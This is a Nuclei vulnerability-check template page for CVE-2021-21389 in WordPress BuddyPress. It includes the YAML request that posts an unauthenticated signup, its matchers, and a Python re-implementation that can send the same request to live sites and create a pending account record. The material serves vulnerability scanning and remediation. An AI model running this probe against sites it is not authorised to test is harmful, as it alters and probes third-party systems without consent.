BuddyPress REST API <7.2.1 - Privilege Escalation/Remote Code Execution
ID: CVE-2021-21389
Severity: high
Author: lotusdll
Tags: cve2021,cve,wordpress,wp-plugin,rce,wp,buddypress
Description
WordPress BuddyPress before version 7.2.1 (affected from 5.0.0, per the NVD entry) allows a non-privileged, regular user to obtain administrator rights through a flaw in the plugin's REST API members endpoint, which can then be leveraged for remote code execution. This template does not perform that role change: it exercises only the BuddyPress REST signup endpoint and reports a match when the target accepts an unauthenticated registration.
YAML Source
id: CVE-2021-21389

info:
  name: BuddyPress REST API <7.2.1 - Privilege Escalation/Remote Code Execution
  author: lotusdll
  severity: high
  description: WordPress BuddyPress before version 7.2.1 is susceptible to a privilege escalation vulnerability that can be leveraged to perform remote code execution.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to gain unauthorized access to sensitive information, escalate privileges, or execute arbitrary code on the affected system.
  remediation: This issue has been remediated in WordPress BuddyPress 7.2.1.
  reference:
    - https://github.com/HoangKien1020/CVE-2021-21389
    - https://buddypress.org/2021/03/buddypress-7-2-1-security-release/
    - https://codex.buddypress.org/releases/version-7-2-1/
    - https://github.com/buddypress/BuddyPress/security/advisories/GHSA-m6j4-8r7p-wpp3
    - https://nvd.nist.gov/vuln/detail/CVE-2021-21389
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2021-21389
    cwe-id: CWE-863
    epss-score: 0.83143
    epss-percentile: 0.98426
    cpe: cpe:2.3:a:buddypress:buddypress:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: buddypress
    product: buddypress
    framework: wordpress
  tags: cve2021,cve,wordpress,wp-plugin,rce,wp,buddypress

http:
  - raw:
      - |
        POST /wp-json/buddypress/v1/signup HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json; charset=UTF-8

        {
          "user_login":"{{randstr}}",
          "password":"{{randstr}}",
          "user_name":"{{randstr}}",
          "user_email":"{{randstr}}@interact.sh"
        }

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "user_login"
          - "registered"
          - "activation_key"
          - "user_email"
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f28e602478b3ceb1da7215b74174649cf49b9aa6f1e4c8d8f30af1bb087587f6022100ea0b7995eb1a422e2c99cd8744a0fd03375c1927264862596c05312af90f1064:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is run with the Nuclei scanner. It sends a single POST to /wp-json/buddypress/v1/signup with random credentials and reports a match only when all three matchers hold: the response is HTTP 200, a response header contains "application/json", and the body contains all of "user_login", "registered", "activation_key" and "user_email". That combination means the target created a pending signup for an unauthenticated caller. Two things to keep in mind: the check is not a version fingerprint, so confirm the installed BuddyPress version before reporting, and a positive result leaves a pending signup record (and an activation e-mail addressed to the random interact.sh mailbox) on the target, which should be cleaned up after the engagement.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-21389.yaml"
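The following is an added example, not the template's own code and not part of nuclei: a small Python re-implementation of what the template does, so that the matcher logic can be read and tested without the scanner. It builds the same four-field signup payload, applies the three matchers with the template's AND semantics, and includes constructed sample responses (not captured from a real site) so it runs offline. The function and constant names, and the sample response bodies, are assumptions made for this example.

```python
"""Stand-alone re-implementation of the CVE-2021-21389 Nuclei template's check.

Added example: not the template's code and not nuclei. It reproduces the
signup request the template sends and the three AND-ed matchers it applies.
Network use is optional; the constructed samples at the bottom run offline.
"""
import json
import secrets
import string
import urllib.error
import urllib.request
from typing import Mapping

SIGNUP_PATH = "/wp-json/buddypress/v1/signup"
# Matcher 1 (part: body, condition: and): every word must appear.
BODY_WORDS = ("user_login", "registered", "activation_key", "user_email")
# Matcher 2 (part: header): this word must appear somewhere in the headers.
HEADER_WORD = "application/json"
# Matcher 3 (type: status).
EXPECTED_STATUS = 200


def randstr(n: int = 12) -> str:
    """Analogue of nuclei's {{randstr}}: a random lowercase alphanumeric string."""
    alphabet = string.ascii_lowercase + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(n))


def build_signup_payload(domain: str = "interact.sh") -> dict:
    """The four fields the template posts. interact.sh is the template's
    placeholder mail domain; substitute a domain you control if you want the
    activation e-mail as additional proof."""
    return {
        "user_login": randstr(),
        "password": randstr(),
        "user_name": randstr(),
        "user_email": f"{randstr()}@{domain}",
    }


def matches(status: int, headers: Mapping[str, str], body: str) -> bool:
    """Evaluate the template's matchers with matchers-condition: and."""
    body_ok = all(word in body for word in BODY_WORDS)
    header_blob = "\n".join(f"{k}: {v}" for k, v in headers.items())
    header_ok = HEADER_WORD in header_blob
    status_ok = status == EXPECTED_STATUS
    return body_ok and header_ok and status_ok


def check_target(base_url: str, timeout: float = 10.0) -> bool:
    """Send the signup request to a live target and evaluate the matchers.
    As with the template, a True result means a pending signup record now
    exists on the target; remove it afterwards."""
    data = json.dumps(build_signup_payload()).encode()
    req = urllib.request.Request(
        base_url.rstrip("/") + SIGNUP_PATH,
        data=data,
        headers={"Content-Type": "application/json; charset=UTF-8"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return matches(resp.status, dict(resp.headers),
                           resp.read().decode(errors="replace"))
    except urllib.error.HTTPError as e:
        # Non-2xx responses still go through the matchers (status matcher fails).
        return matches(e.code, dict(e.headers), e.read().decode(errors="replace"))


# Constructed sample responses for the offline demonstration (assumed shapes,
# not recorded from a real BuddyPress site).
SAMPLE_HIT = (
    200,
    {"Content-Type": "application/json; charset=UTF-8"},
    json.dumps([{"user_login": "a1b2c3", "registered": "2021-03-20 10:00:00",
                 "user_email": "a1b2c3@interact.sh", "activation_key": "deadbeef"}]),
)
SAMPLE_MISS = (
    403,
    {"Content-Type": "application/json; charset=UTF-8"},
    json.dumps({"code": "rest_forbidden", "message": "Forbidden",
                "data": {"status": 403}}),
)

if __name__ == "__main__":
    print("constructed hit  ->", matches(*SAMPLE_HIT))
    print("constructed miss ->", matches(*SAMPLE_MISS))
```

check_target() is the only part that touches the network; pass it the site root (for example https://target.example) and it returns the same verdict the template would. Note that the header matcher is a plain substring test over all headers, so a JSON error page with the right words in its body would also satisfy it if it came back with status 200; the status and body matchers together are what make the check specific.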